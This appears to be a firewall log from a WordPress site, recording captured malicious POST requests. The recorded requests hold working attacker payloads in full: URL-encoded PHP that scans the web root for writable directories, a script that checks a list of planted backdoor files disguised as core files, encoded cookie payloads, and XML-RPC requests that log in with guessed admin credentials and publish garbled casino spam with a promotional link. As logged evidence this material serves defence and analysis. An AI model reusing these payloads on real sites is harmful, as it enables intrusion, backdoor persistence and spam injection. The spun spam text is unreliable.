3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvpTHvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAioaEyoaDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-encoding:gzip,deflate\nsec-fetch-user:?1\n\npe=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 22:30:12","213.209.159.254","POST","\/wp-admin\/site-health.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> uA:%3C%3Fphp%20%20%20%24r%20%3D%20%27\/www\/wwwroot\/dewenlabels.com%27%3B%20%24x%20%3D%20%5B%22\/wp-includes\/class-wp-widget-factory.php%22%3D%3E%22bd%40%40301749947%40%40%24_COOKIE%5B4%22%2C%0A%22\/wp-blog-header.php%22%3D%3E%22bd%40%40287668532%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-config.php%22%3D%3E%22bd%40%40290180459%40%40%24_COOKIE%5B3%22%2C%0A%22\/wp-includes\/feed.php%22%3D%3E%22bd%40%40320334786%40%40%24_COOKIE%5B8%22%2C%0A%22\/wp-includes\/class-wp-theme.php%22%3D%3E%22bd%40%40320334792%40%4044%22%2C%0A%22\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php%22%3D%3E%22bd%40%40320334797%40%4033%22%2C%0A%22\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php%22%3D%3E%22bd%40%40320334962%40%401055%22%2C%0A%22\/wp-admin\/includes\/theme.php%22%3D%3E%22bd%40%40320334788%40%40%24_COOKIE%5B5%22%2C%0A%22\/wp-admin\/user\/profile.php%22%3D%3E%22bd%40%40320334783%40%4089%22%2C%0A%22\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php%22%3D%3E%22bd%40%40320334955%40%4033%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php%22%3D%3E%22bd%40%40320334795%40%401056%22%2C%0A%22\/wp-includes\/compat-utf8.php%22%3D%3E%22bd%40%40320334941%40%40fpVGge%22%2C%0A%22\/wp-includes\/html-api\/class-wp-html-token.php%22%3D%3E%22bd%40%40320334780%40%40etswnK%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Poly1305\/actionscript.php%22%3D%3E%22bd%40%40320334794%40%40924%22%2C%0A%22\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php%22%3D%3E%22bd%40%40320334800%40%401041%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php%22%3D%3E%22bd%40%40320334934%40%40%24_COOKIE%5B9%22%2C%0A%22\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php%22%3D%3E%22bd%40%40320334937%40%40%24_COOKIE%5B7%22%2C%0A%22\/wp-includes\/Text\/rmljaqn\/wmqpnar\/gomtqpa\/corp.php%22%3D%3E%22bd%40%40320334958%40%40610%22%2C%0A%22\/wp-includes\/class-wp-term.php%22%3D%3E%22bd%40%40320334931%40%40CmArqm%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/AEGIS\/zh_CN.php%22%3D%3E%22bd%40%40320334793%40%40621%22%2C%0A%22\/wp-includes\/pomo\/mo.php%22%3D%3E%22bd%40%40320334938%40%40HaFMzo%22%2C%0A%22\/wp-admin\/site-health.php%22%3D%3E%22bd%40%40301750373%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php%22%3D%3E%22bd%40%40320334952%40%4033%22%2C%0A%22\/wp-includes\/sitemaps\/enqpgkz\/gnsdqvi\/idhbwvj\/Validator.php%22%3D%3E%22bd%40%40320334959%40%401009%22%5D%3B%20foreach%20%28%24x%20as%20%24p%20%3D%3E%20%24l%29%20%7B%20%20%20%20%20%24f%20%3D%20%22%7B%24r%7D%7B%24p%7D%22%3B%20%20%20%20%20list%28%24t%2C%20%24id%2C%20%24pt%29%20%3D%20explode%28%27%40%40%27%2C%20%24l%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%7D%20%20%20%20%20if%20%28is_numeric%28%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%24fs%20%3D%20filesize%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24fs%20%21%3D%20%24pt%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23bs%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24c%20%3D%20file_get_contents%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%21strstr%28%24c%2C%20%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20die%28%27%21end%21%27%29%3B%20","POST \/wp-admin\/site-health.php HTTP\/1.1\nhost:dewenlabels.com\nsec-fetch-site:none\naccept:*\/*\naccept-encoding:gzip,deflate\nsec-fetch-dest:document\ncookie:4=3a8677dc156d672c6e12f16237adcc36; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvqHRvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzSwL2IjqTIxVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-length:4928\n\nuA=%3C%3Fphp%20%20%20%24r%20%3D%20%27\/www\/wwwroot\/dewenlabels.com%27%3B%20%24x%20%3D%20%5B%22\/wp-includes\/class-wp-widget-factory.php%22%3D%3E%22bd%40%40301749947%40%40%24_COOKIE%5B4%22%2C%0A%22\/wp-blog-header.php%22%3D%3E%22bd%40%40287668532%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-config.php%22%3D%3E%22bd%40%40290180459%40%40%24_COOKIE%5B3%22%2C%0A%22\/wp-includes\/feed.php%22%3D%3E%22bd%40%40320334786%40%40%24_COOKIE%5B8%22%2C%0A%22\/wp-includes\/class-wp-theme.php%22%3D%3E%22bd%40%40320334792%40%4044%22%2C%0A%22\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php%22%3D%3E%22bd%40%40320334797%40%4033%22%2C%0A%22\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php%22%3D%3E%22bd%40%40320334962%40%401055%22%2C%0A%22\/wp-admin\/includes\/theme.php%22%3D%3E%22bd%40%40320334788%40%40%24_COOKIE%5B5%22%2C%0A%22\/wp-admin\/user\/profile.php%22%3D%3E%22bd%40%40320334783%40%4089%22%2C%0A%22\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php%22%3D%3E%22bd%40%40320334955%40%4033%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php%22%3D%3E%22bd%40%40320334795%40%401056%22%2C%0A%22\/wp-includes\/compat-utf8.php%22%3D%3E%22bd%40%40320334941%40%40fpVGge%22%2C%0A%22\/wp-includes\/html-api\/class-wp-html-token.php%22%3D%3E%22bd%40%40320334780%40%40etswnK%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Poly1305\/actionscript.php%22%3D%3E%22bd%40%40320334794%40%40924%22%2C%0A%22\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php%22%3D%3E%22bd%40%40320334800%40%401041%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php%22%3D%3E%22bd%40%40320334934%40%40%24_COOKIE%5B9%22%2C%0A%22\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php%22%3D%3E%22bd%40%40320334937%40%40%24_COOKIE%5B7%22%2C%0A%22\/wp-includes\/Text\/rmljaqn\/wmqpnar\/gomtqpa\/corp.php%22%3D%3E%22bd%40%40320334958%40%40610%22%2C%0A%22\/wp-includes\/class-wp-term.php%22%3D%3E%22bd%40%40320334931%40%40CmArqm%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/AEGIS\/zh_CN.php%22%3D%3E%22bd%40%40320334793%40%40621%22%2C%0A%22\/wp-includes\/pomo\/mo.php%22%3D%3E%22bd%40%40320334938%40%40HaFMzo%22%2C%0A%22\/wp-admin\/site-health.php%22%3D%3E%22bd%40%40301750373%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php%22%3D%3E%22bd%40%40320334952%40%4033%22%2C%0A%22\/wp-includes\/sitemaps\/enqpgkz\/gnsdqvi\/idhbwvj\/Validator.php%22%3D%3E%22bd%40%40320334959%40%401009%22%5D%3B%20foreach%20%28%24x%20as%20%24p%20%3D%3E%20%24l%29%20%7B%20%20%20%20%20%24f%20%3D%20%22%7B%24r%7D%7B%24p%7D%22%3B%20%20%20%20%20list%28%24t%2C%20%24id%2C%20%24pt%29%20%3D%20explode%28%27%40%40%27%2C%20%24l%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%7D%20%20%20%20%20if%20%28is_numeric%28%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%24fs%20%3D%20filesize%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24fs%20%21%3D%20%24pt%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23bs%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24c%20%3D%20file_get_contents%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%21strstr%28%24c%2C%20%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20die%28%27%21end%21%27%29%3B%20"]
["2026-05-16 23:41:08","185.153.197.91","POST","\/xmlrpc.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.0.0 Safari\/537.36","post","select.+(from|limit) >> <?xml version:\"1.0\" encoding=\"UTF-8\"?>\r\n<methodCall>\r\n  <methodName>wp.newPost<\/methodName>\r\n  <params>\r\n    <param><value>1<\/value><\/param>\r\n    <param><value>admin<\/value><\/param>\r\n    <param><value>Admin@123<\/value><\/param>\r\n    <param>\r\n      <value>\r\n        <struct>\r\n          <member><name>post_type<\/name>\r\n            <value>post<\/value><\/member>\r\n\t\t  <member><name>post_status<\/name>\r\n            <value>publish<\/value><\/member>\r\n\t\t  <member><name>post_title<\/name>\r\n            <value><![CDATA[An informed Commission inside Casinos on the internet � Quick Withdrawals and you can Fair RTP]]><\/value><\/member>\r\n\t\t  <member><name>post_content<\/name>\r\n            <value><![CDATA[<p>That's what online casinos to your greatest payment possibilities are common throughout the. It's also regarding quality, easy game play, reasonable aspects, and you may rich music-graphics that don't be cheaper. When you are spinning ports on the cellular telephone otherwise going all-inside for the a real time casino poker desk, an informed gambling enterprises generate all mouse click getting advanced. Think about some thing faster? It should be not value your time otherwise put. Discover only the finest online casino on the web to love for every single gaming session.<\/p>\r\n<h2>Ratings of Top Gambling on line Websites<\/h2>\r\n<p>We all require the better incentive casinos online! However, no number of showy adverts is take on sincere reading user reviews. Systems such as for instance are very a crucial equipment to own players looking to distinguish <a href=\"https:\/\/moon-princess-100.gr.com\/\">moon princess 100 πού να παίξεις<\/a> anywhere between legitimate casinos and those which have suspicious reputations. When dozens (otherwise many) away from users report easy payouts, of good use assistance, and you can an enjoyable experience, it is a so good indication you found a good keeper.  not, the contrary is even true. Merely here are some such advice:<\/p>\r\n<p>A user who documented a two-month race more than ID confirmation and hopeless file need. A knowledgeable online casinos having blackjack options do not do particularly tips.<\/p>\r\n<p>A unique associate try troubled of the misleading incentive terminology and you may inconsistency ranging from real funds and bonus enjoy. That is not an informed added bonus on-line casino! Now, examine by using actual confident knowledge:<\/p>\r\n<p>A top roller which undoubtedly liked the help and you will timely cashouts. This is what the big ideal internet casino will be submit.<\/p>\r\n<p>A person who had been first doubtful however, at some point had a soft and you can credible feel. Therefore, what's the takeaway? Area viewpoints issues. They conserves time, currency, and you may outrage. Thus, check review programs to choose merely best paying internet casino systems.<\/p>\r\n<h2>Transparent Bonus Conditions<\/h2>\r\n<p>An informed casino bonus online look unbelievable on the surface, if the conditions and terms try in pretty bad shape, it's fundamentally inadequate. Inside 2025, the big greatest casinos on the internet understand that people is sick of obscure rules, invisible constraints, and you can impossible-to-obvious wagering standards. So, what does �transparent offer� extremely suggest? Why don't we select:<\/p>\r\n<ol>\n<li>Betting criteria is actually demonstrably stated (30x added bonus, 40x put   bonus).<\/li>\n<li>Cashout limitations try fair (maybe not \"winnings $1000, withdraw $50\").<\/li>\n<li>Qualified games are detailed upfront, no guessing and that ports be considered.<\/li>\n<li>Day limitations try sensible (you are not hurried burning as a consequence of $2 hundred when you look at the a day).<\/li>\n<li>The conclusion from extra loans rather than genuine harmony is said certainly.<\/li>\n<\/ol>\r\n<p>Unnecessary players had been burnt from the buried terms that get implemented once you've currently transferred and starred. That is why an educated internet casino bonuses include brush, digestible information. Essentially, close to new promo flag or perhaps in a simple pop-upwards, maybe not buried during the good ten-web page PDF. Thus, the top best casinos on the internet is going to be openly truthful having beginners.<\/p>\r\n<h2>Top 10 Finest Casinos on the internet<\/h2>\r\n<p>Therefore, exactly what online casino is the best? Really, come across quick payment running and you will a good RTP commission. Ideal incentives online casino web sites create effortless. Once your verification is completed, withdrawals are generally canned within 24 hours, perhaps even less. Besides, exactly what are the best web based casinos? Well, individuals with a reasonable RTP (essentially 97% or over). It indicates you're not always to try out during the a severe drawback. Legitimate gambling enterprises focus on authorized online game team exactly who make certain the ports and you will desk games fulfill industry requirements. Therefore, the best online casino payout are reasonable and you can square.<\/p>\r\n<h2>Just what Gambling enterprises should you not have confidence in<\/h2>\r\n<p>Do you want a knowledgeable casinos on the internet, pal? Predicated on actual pages and you will frequent problems released for the credible sites including , the second casinos allow us a credibility to own unreliability. Should it be put-off payouts, inaccessible customer support, or questionable bonus systems, like programs keeps repeatedly place the expectations of players to your sample.<\/p>]]><\/value><\/member>\t  \r\n\t\t  <member><name>post_date_gmt<\/name>\r\n            <value><dateTime.iso8601>20260516T15:41:07<\/dateTime.iso8601><\/value><\/member>\r\n\t\t  <member><name>post_name<\/name>\r\n            <value><![CDATA[an-informed-commission-inside-casinos-on-the-internet-�-quick-withdrawals-and-you-can-fair-rtp]]><\/value><\/member>\r\n          \r\n        <\/struct>\r\n      <\/value>\r\n    <\/param>\r\n  <\/params>\r\n<\/methodCall>","POST \/xmlrpc.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.0.0 Safari\/537.36\ncontent-length:5918\nhost:47.254.126.238\ncontent-type:text\/xml; charset=utf-8\nconnection:Close\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<methodCall>\r\n  <methodName>wp.newPost<\/methodName>\r\n  <params>\r\n    <param><value>1<\/value><\/param>\r\n    <param><value>admin<\/value><\/param>\r\n    <param><value>Admin@123<\/value><\/param>\r\n    <param>\r\n      <value>\r\n        <struct>\r\n          <member><name>post_type<\/name>\r\n            <value>post<\/value><\/member>\r\n\t\t  <member><name>post_status<\/name>\r\n            <value>publish<\/value><\/member>\r\n\t\t  <member><name>post_title<\/name>\r\n            <value><![CDATA[An informed Commission inside Casinos on the internet � Quick Withdrawals and you can Fair RTP]]><\/value><\/member>\r\n\t\t  <member><name>post_content<\/name>\r\n            <value><![CDATA[<p>That's what online casinos to your greatest payment possibilities are common throughout the. It's also regarding quality, easy game play, reasonable aspects, and you may rich music-graphics that don't be cheaper. When you are spinning ports on the cellular telephone otherwise going all-inside for the a real time casino poker desk, an informed gambling enterprises generate all mouse click getting advanced. Think about some thing faster? It should be not value your time otherwise put. Discover only the finest online casino on the web to love for every single gaming session.<\/p>\r\n<h2>Ratings of Top Gambling on line Websites<\/h2>\r\n<p>We all require the better incentive casinos online! However, no number of showy adverts is take on sincere reading user reviews. Systems such as for instance are very a crucial equipment to own players looking to distinguish <a href=\"https:\/\/moon-princess-100.gr.com\/\">moon princess 100 πού να παίξεις<\/a> anywhere between legitimate casinos and those which have suspicious reputations. When dozens (otherwise many) away from users report easy payouts, of good use assistance, and you can an enjoyable experience, it is a so good indication you found a good keeper.  not, the contrary is even true. Merely here are some such advice:<\/p>\r\n<p>A user who documented a two-month race more than ID confirmation and hopeless file need. A knowledgeable online casinos having blackjack options do not do particularly tips.<\/p>\r\n<p>A unique associate try troubled of the misleading incentive terminology and you may inconsistency ranging from real funds and bonus enjoy. That is not an informed added bonus on-line casino! Now, examine by using actual confident knowledge:<\/p>\r\n<p>A top roller which undoubtedly liked the help and you will timely cashouts. This is what the big ideal internet casino will be submit.<\/p>\r\n<p>A person who had been first doubtful however, at some point had a soft and you can credible feel. Therefore, what's the takeaway? Area viewpoints issues. They conserves time, currency, and you may outrage. Thus, check review programs to choose merely best paying internet casino systems.<\/p>\r\n<h2>Transparent Bonus Conditions<\/h2>\r\n<p>An informed casino bonus online look unbelievable on the surface, if the conditions and terms try in pretty bad shape, it's fundamentally inadequate. Inside 2025, the big greatest casinos on the internet understand that people is sick of obscure rules, invisible constraints, and you can impossible-to-obvious wagering standards. So, what does �transparent offer� extremely suggest? Why don't we select:<\/p>\r\n<ol>\n<li>Betting criteria is actually demonstrably stated (30x added bonus, 40x put   bonus).<\/li>\n<li>Cashout limitations try fair (maybe not \"winnings $1000, withdraw $50\").<\/li>\n<li>Qualified games are detailed upfront, no guessing and that ports be considered.<\/li>\n<li>Day limitations try sensible (you are not hurried burning as a consequence of $2 hundred when you look at the a day).<\/li>\n<li>The conclusion from extra loans rather than genuine harmony is said certainly.<\/li>\n<\/ol>\r\n<p>Unnecessary players had been burnt from the buried terms that get implemented once you've currently transferred and starred. That is why an educated internet casino bonuses include brush, digestible information. Essentially, close to new promo flag or perhaps in a simple pop-upwards, maybe not buried during the good ten-web page PDF. Thus, the top best casinos on the internet is going to be openly truthful having beginners.<\/p>\r\n<h2>Top 10 Finest Casinos on the internet<\/h2>\r\n<p>Therefore, exactly what online casino is the best? Really, come across quick payment running and you will a good RTP commission. Ideal incentives online casino web sites create effortless. Once your verification is completed, withdrawals are generally canned within 24 hours, perhaps even less. Besides, exactly what are the best web based casinos? Well, individuals with a reasonable RTP (essentially 97% or over). It indicates you're not always to try out during the a severe drawback. Legitimate gambling enterprises focus on authorized online game team exactly who make certain the ports and you will desk games fulfill industry requirements. Therefore, the best online casino payout are reasonable and you can square.<\/p>\r\n<h2>Just what Gambling enterprises should you not have confidence in<\/h2>\r\n<p>Do you want a knowledgeable casinos on the internet, pal? Predicated on actual pages and you will frequent problems released for the credible sites including , the second casinos allow us a credibility to own unreliability. Should it be put-off payouts, inaccessible customer support, or questionable bonus systems, like programs keeps repeatedly place the expectations of players to your sample.<\/p>]]><\/value><\/member>\t  \r\n\t\t  <member><name>post_date_gmt<\/name>\r\n            <value><dateTime.iso8601>20260516T15:41:07<\/dateTime.iso8601><\/value><\/member>\r\n\t\t  <member><name>post_name<\/name>\r\n            <value><![CDATA[an-informed-commission-inside-casinos-on-the-internet-�-quick-withdrawals-and-you-can-fair-rtp]]><\/value><\/member>\r\n          \r\n        <\/struct>\r\n      <\/value>\r\n    <\/param>\r\n  <\/params>\r\n<\/methodCall>"]
["2026-05-16 23:41:10","185.153.197.91","POST","\/xmlrpc.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.0.0 Safari\/537.36","post","select.+(from|limit) >> <?xml version:\"1.0\"?>\r\n<methodCall>\r\n<methodName>metaWeblog.newPost<\/methodName>\r\n<params>\r\n<param><value><array><data>\r\n  <value><int>0<\/int><\/value>\r\n  <value><string>admin<\/string><\/value>\r\n  <value><string>Admin@123<\/string><\/value>\r\n  <value><struct>\r\n  <member><name>title<\/name><value><![CDATA[An informed Commission inside Casinos on the internet � Quick Withdrawals and you can Fair RTP]]><\/value><\/member>\r\n  <member><name>description<\/name><value><![CDATA[<p>That's what online casinos to your greatest payment possibilities are common throughout the. It's also regarding quality, easy game play, reasonable aspects, and you may rich music-graphics that don't be cheaper. When you are spinning ports on the cellular telephone otherwise going all-inside for the a real time casino poker desk, an informed gambling enterprises generate all mouse click getting advanced. Think about some thing faster? It should be not value your time otherwise put. Discover only the finest online casino on the web to love for every single gaming session.<\/p>\r\n<h2>Ratings of Top Gambling on line Websites<\/h2>\r\n<p>We all require the better incentive casinos online! However, no number of showy adverts is take on sincere reading user reviews. Systems such as for instance are very a crucial equipment to own players looking to distinguish <a href=\"https:\/\/moon-princess-100.gr.com\/\">moon princess 100 πού να παίξεις<\/a> anywhere between legitimate casinos and those which have suspicious reputations. When dozens (otherwise many) away from users report easy payouts, of good use assistance, and you can an enjoyable experience, it is a so good indication you found a good keeper.  not, the contrary is even true. Merely here are some such advice:<\/p>\r\n<p>A user who documented a two-month race more than ID confirmation and hopeless file need. A knowledgeable online casinos having blackjack options do not do particularly tips.<\/p>\r\n<p>A unique associate try troubled of the misleading incentive terminology and you may inconsistency ranging from real funds and bonus enjoy. That is not an informed added bonus on-line casino! Now, examine by using actual confident knowledge:<\/p>\r\n<p>A top roller which undoubtedly liked the help and you will timely cashouts. This is what the big ideal internet casino will be submit.<\/p>\r\n<p>A person who had been first doubtful however, at some point had a soft and you can credible feel. Therefore, what's the takeaway? Area viewpoints issues. They conserves time, currency, and you may outrage. Thus, check review programs to choose merely best paying internet casino systems.<\/p>\r\n<h2>Transparent Bonus Conditions<\/h2>\r\n<p>An informed casino bonus online look unbelievable on the surface, if the conditions and terms try in pretty bad shape, it's fundamentally inadequate. Inside 2025, the big greatest casinos on the internet understand that people is sick of obscure rules, invisible constraints, and you can impossible-to-obvious wagering standards. So, what does �transparent offer� extremely suggest? Why don't we select:<\/p>\r\n<ol>\n<li>Betting criteria is actually demonstrably stated (30x added bonus, 40x put   bonus).<\/li>\n<li>Cashout limitations try fair (maybe not \"winnings $1000, withdraw $50\").<\/li>\n<li>Qualified games are detailed upfront, no guessing and that ports be considered.<\/li>\n<li>Day limitations try sensible (you are not hurried burning as a consequence of $2 hundred when you look at the a day).<\/li>\n<li>The conclusion from extra loans rather than genuine harmony is said certainly.<\/li>\n<\/ol>\r\n<p>Unnecessary players had been burnt from the buried terms that get implemented once you've currently transferred and starred. That is why an educated internet casino bonuses include brush, digestible information. Essentially, close to new promo flag or perhaps in a simple pop-upwards, maybe not buried during the good ten-web page PDF. Thus, the top best casinos on the internet is going to be openly truthful having beginners.<\/p>\r\n<h2>Top 10 Finest Casinos on the internet<\/h2>\r\n<p>Therefore, exactly what online casino is the best? Really, come across quick payment running and you will a good RTP commission. Ideal incentives online casino web sites create effortless. Once your verification is completed, withdrawals are generally canned within 24 hours, perhaps even less. Besides, exactly what are the best web based casinos? Well, individuals with a reasonable RTP (essentially 97% or over). It indicates you're not always to try out during the a severe drawback. Legitimate gambling enterprises focus on authorized online game team exactly who make certain the ports and you will desk games fulfill industry requirements. Therefore, the best online casino payout are reasonable and you can square.<\/p>\r\n<h2>Just what Gambling enterprises should you not have confidence in<\/h2>\r\n<p>Do you want a knowledgeable casinos on the internet, pal? Predicated on actual pages and you will frequent problems released for the credible sites including , the second casinos allow us a credibility to own unreliability. Should it be put-off payouts, inaccessible customer support, or questionable bonus systems, like programs keeps repeatedly place the expectations of players to your sample.<\/p>]]><\/value><\/member>\r\n  <member><name>dateCreated<\/name><value><dateTime.iso8601>20260516T15:41:08<\/dateTime.iso8601><\/value><\/member>\r\n  <member><name>mt_allow_comments<\/name><value><int>0<\/int><\/value><\/member>\r\n  <member><name>mt_allow_pings<\/name><value><int>0<\/int><\/value><\/member>\r\n  <member><name>post_type<\/name><value><string>post<\/string><\/value><\/member>\r\n  <member><name>mt_keywords<\/name><value><string><\/string><\/value><\/member>\r\n  \r\n  <member><name>custom_fields<\/name><value><array><data>\r\n  <value><string><\/string><\/value>\r\n<\/data><\/array><\/value><\/member>\r\n<\/struct><\/value>\r\n  